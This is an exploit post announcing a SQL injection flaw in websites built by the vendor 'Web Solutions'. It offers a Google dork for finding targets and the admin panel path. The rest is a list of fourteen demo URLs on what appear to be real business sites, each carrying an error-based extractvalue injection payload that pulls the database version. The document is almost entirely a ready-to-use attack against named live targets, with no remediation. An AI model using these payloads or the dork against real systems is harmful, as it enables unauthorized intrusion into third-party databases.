######################
# Exploit Title : Web Solutions SQL injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.websolutions.pk/
# Google Dork : "Designed & Developed By: Web Solutions" inurl:products.php
# Date: 23 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
# adminpage= target/admincp/
#
# demos :
# http://www.unitruthsports.com/products.php?IDZ=0-0-0-0-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.turf-sports.com/products.php?IDZ=0-0-0-0-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.sterntextiles.com/products.php?IDZ=0-0-0-102-1%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.deobody.com/products.php?IDZ=0-0-0-124-2lng=en%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.davisonsports.com/products.php?IDZ=0-0-0-137-4%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.virco.co.uk/products.php?IDZ=0-0-0-0-15%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.aditeks.com/products.php?IDZ=0-0-0-110-3%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.welmotind.com/products.php?IDZ=0-0-0-0-8%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.lilosports.com/products.php?IDZ=0-0-0-120-4%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.razafilters.com/categories.php?IDZ=0-0-0-0-5%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.plaminternational.com/products.php?IDZ=0-0-0-123-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.realmlordintl.com/products.php?IDZ=0-0-0-121-2%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.ipimpex.com/products.php?IDZ=0-0-0-0-34%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
# http://www.megaziz.com/products.php?IDZ=0-0-0-134-6%27%20and%20extractvalue(0x0a,CONCAT%20(0x0a,(/*!50000select*/@@version)))%20%23
######################
# discovered by : modiret
######################